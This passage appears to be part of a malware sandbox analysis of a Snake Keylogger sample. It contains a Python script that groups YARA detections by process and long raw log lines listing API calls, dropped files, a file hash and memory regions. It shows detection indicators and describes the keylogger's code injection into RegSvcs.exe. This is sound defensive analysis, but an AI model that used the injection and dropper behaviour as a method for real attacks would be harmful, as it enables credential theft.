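    ("2.2.lecheries.exe.4100000.2.unpack", "UNPACKEDPE", "Detects Snake Keylogger"),
    ("8.2.lecheries.exe.3e60000.2.unpack", "UNPACKEDPE", "Windows_Trojan_SnakeKeylogger_af3faa65"),
    ("6.0.EmbeddedExe2.exe.d20000.0.unpack", "UNPACKEDPE", "Windows_Trojan_SnakeKeylogger_af3faa65"),
    ("00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp", "MEMORY", "Windows_Trojan_SnakeKeylogger_af3faa65"),
    ("00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp", "MEMORY", "Detects Snake Keylogger"),
    ("00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp", "MEMORY", "Windows_Trojan_SnakeKeylogger_af3faa65"),
    ("00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp", "MEMORY", "Detects Snake Keylogger"),
    ("00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp", "MEMORY", "Windows_Trojan_SnakeKeylogger_af3faa65"),
    ("Process Memory Space: RegSvcs.exe PID: 3496", "MEMORYSTR", "Detects Snake Keylogger"),
    (r"C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe", "DROPPED", "Detects Snake Keylogger"),
]

SNAKE_RULES = {"Windows_Trojan_SnakeKeylogger_af3faa65", "Detects Snake Keylogger"}

# Identifier shapes used in the report: '<proc>.<stage>.<image>.<base>.<n>[.raw].unpack' and
# '<proc, 8 digits>.<stage>.<dump id>.<base, 16 hex>.<f5>.<f6>.<f7>.<f8>.sdmp'.
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?\.exe)\.([0-9a-f]+)\.\d+(?:\.raw)?\.unpack$", re.I)
SDMP_RE = re.compile(r"^(\d{8})\.(\d{8})\.\d+\.([0-9a-f]{16})\.([0-9a-f]{8})\.[0-9a-f]{8}\.([0-9a-f]{8})\.[0-9a-f]{8}\.sdmp$", re.I)
MEMSTR_RE = re.compile(r"^Process Memory Space: (.+?) PID: (\d+)$")

# Assumption, not stated by the report: sdmp fields 5 and 7 carry the Win32
# MEMORY_BASIC_INFORMATION Protect and Type values. The constants below line up with every
# identifier above.
PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEMTYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def parse_source(src):
    """Map one source identifier to (process_index, image_name, details); unknown -> None."""
    m = UNPACK_RE.match(src)
    if m:
        return int(m.group(1)), m.group(3), {"kind": "unpack", "base": int(m.group(4), 16)}
    m = SDMP_RE.match(src)
    if m:
        prot, typ = int(m.group(4), 16), int(m.group(5), 16)
        return int(m.group(1)), None, {"kind": "sdmp", "base": int(m.group(3), 16),
                                       "protect": PROTECT.get(prot, hex(prot)),
                                       "type": MEMTYPE.get(typ, hex(typ))}
    m = MEMSTR_RE.match(src)
    if m:
        return None, m.group(1), {"kind": "memstr", "pid": int(m.group(2))}
    return None, None, {"kind": "file", "path": src}


def pivot(matches):
    """Group rule hits per analysis process; image names are learned from the .unpack
    identifiers and applied to the .sdmp ones, which carry only the process index."""
    image_of = {}
    procs = defaultdict(lambda: {"rules": set(), "regions": {}})
    memstr, files = defaultdict(set), defaultdict(set)
    for src, _type, rule in matches:
        idx, image, d = parse_source(src)
        if d["kind"] in ("unpack", "sdmp"):
            if image:
                image_of[idx] = image
            procs[idx]["rules"].add(rule)
            if d["kind"] == "sdmp":
                procs[idx]["regions"][d["base"]] = (d["protect"], d["type"])
            else:
                procs[idx]["regions"].setdefault(d["base"], None)
        elif d["kind"] == "memstr":
            memstr[(image, d["pid"])].add(rule)
        else:
            files[d["path"]].add(rule)
    return image_of, dict(procs), dict(memstr), dict(files)


def verdicts(matches):
    """One entry per process: image, whether a Snake Keylogger rule hit, and which regions
    are writable+executable or not image-backed (i.e. injected or unpacked code)."""
    image_of, procs, _, _ = pivot(matches)
    out = {}
    for idx, p in sorted(procs.items()):
        suspicious = {hex(b): pt for b, pt in p["regions"].items()
                      if pt and (pt[0] == "PAGE_EXECUTE_READWRITE" or pt[1] != "MEM_IMAGE")}
        out[idx] = {"image": image_of.get(idx, "?"),
                    "snake": bool(p["rules"] & SNAKE_RULES),
                    "non_image_regions": suspicious}
    return out


if __name__ == "__main__":
    for idx, v in verdicts(MATCHES).items():
        print(idx, v)
```

Run on the entries above, the pivot says what the flat list does not: RegSvcs.exe (process 3), a Microsoft .NET Framework utility, holds Snake Keylogger code in a PAGE_EXECUTE_READWRITE MEM_MAPPED region at 0x702000, which can only be injected code, while EmbeddedExe2.exe (process 6) matches in its own MEM_IMAGE region, i.e. the payload on disk.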
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00893B3A
Source: 8kDIr4ZdNj.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 8kDIr4ZdNj.exe, 00000000.00000003.2153111882.0000000003FE3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 8kDIr4ZdNj.exe, 00000000.00000003.2153111882.0000000003FE3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory (a run of adjacent AutoIt3 interpreter strings: RunAs privilege names, window-selector keywords such as CLASS:, REGEXPTITLE:, [ACTIVE], [LAST], and the GUI container class name): SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: 8kDIr4ZdNj.exe, 00000000.00000000.2140384904.0000000000944000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 8kDIr4ZdNj.exe, 00000000.00000000.2140384904.0000000000944000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: the same AutoIt3 string run as above (SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script. ... AutoIt3GUIContainer`)
Source: lecheries.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: lecheries.exe, 00000002.00000000.2153651802.0000000000C14000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: lecheries.exe, 00000002.00000000.2153651802.0000000000C14000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: the same AutoIt3 string run as above (SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script. ... AutoIt3GUIContainer`)
Source: lecheries.exe, 00000008.00000002.2296672981.0000000000C14000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: lecheries.exe, 00000008.00000002.2296672981.0000000000C14000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: the same AutoIt3 string run as above (SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script. ... AutoIt3GUIContainer`)
Source: 8kDIr4ZdNj.exe | String found in binary or memory: the same AutoIt3 string run as above (SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script. ... AutoIt3GUIContainer`)
Source: lecheries.exe.0.dr | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: lecheries.exe.0.dr | String found in binary or memory: the same AutoIt3 string run as above (SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script. ... AutoIt3GUIContainer`)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008FA1EF: GetFullPathNameW,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008E8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008B21C5
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008C62D2
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_009103DA
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008C242E
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008B25FA
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_0089E6A0
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008A66E1
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008EE616
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008C878F
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008F8889
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008A8808
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_00910857
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008C6844
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008BCB21
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008C6DB6
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008A6F9E
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008A3030
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008B3187
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008BF1D9
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008B1484
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008A5520
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008B7696
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008A5760
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_0089192B
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008B1978
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_0089FCE0
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008B1D90
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_008BBDA6
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_00917DDB
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_0089DF00
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: 0_2_01502018
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B73030
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B83187
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B8F1D9
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B821C5
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B962D2
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B81484
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B9242E
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B825FA
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B75520
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B87696
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B9878F
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B75760
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B78808
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B96844
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B6192B
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B81978
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B8CB21
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B96DB6
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B8BDA6
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B81D90
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00BE7DDB
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B6FD49
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_00B6DF00
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 2_2_019825E0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECFBD50
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB53E3
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECD6F7C
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECBCB24
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECD2C60
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECF4B00
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECD65F0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED960D4
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB6080
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECBA032
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECC4030
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECBA01E
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECBA03E
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED8DDF8
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB9E00
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB7D50
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB1EED
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED03EA0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECEFE90
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED2FE60
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED2DE20
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED7BB90
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED2BB20
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED31CB0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECF7C30
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECD3C20
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED6F9DC
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECBB9B0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED8F964
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB9920
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECEDA70
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED91A94
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED7F804
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECBD810
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECE1780
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECF58D0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED7387C
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED85888
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECC5890
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED315A0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECD1560
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECEF550
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECD3700
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECF76A0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECC3650
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECD1560
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED3D410
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB7410
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB93C0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED73384
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECC1330
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED29480
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECC4A80
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED85490
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECF9430
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB1426
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED2D430
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED851A8
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB11BB
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB1160
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECED150
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED29120
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED032EC
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECE5310
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED2D2D0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECBD2D0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECEF260
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECBF280
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED2F230
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECE7010
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED26FE0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECF6F90
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED30F20
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECDF060
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED0B020
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED2EE10
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECCCDA0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECBED80
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECEAEF4
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED8AEC8
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED72E80
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED70E18
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED08E20
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED6EB94
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED76CA4
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECD4C30
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED70C30
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECF6A00
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED2A9C0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECDAAF0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED32B10
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECC0B00
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECC4A80
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED02A80
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED70A48
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED0E7D0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED78748
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED7085C
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECD882D
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED3A830
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED6E5FC
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECB85D0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED26590
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED2E540
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECC2700
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED98678
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECCA680
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED70670
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED3E3A0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECC6374
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED70484
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ECDA440
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED2E170
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: 5_2_00007FF75ED76144
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D6B328
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D6C190
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D66108
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D6C751
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D6C470
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D64AD9
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D6CA31
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D6BBD2
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D66880
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D69858
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D6BEB0
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D6B4F2
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Code function: 6_2_02D63570
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: 8_2_01600830
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe E61B8F44AB92CF0F9CB1101347967D31E1839979142A4114A7DD02AA237BA021
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function: String function: 00B88900 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ECFA3A0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ECECD00 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ED2BFC0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ECF2890 appears 137 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ED7FC60 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ED05360 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ECDC110 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ECECC30 appears 150 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ED06360 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ED7B8AC appears 457 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ED82CE8 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function: String function: 00007FF75ED2A5D0 appears 78 times
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function: String function: 008B8900 appears 39 times
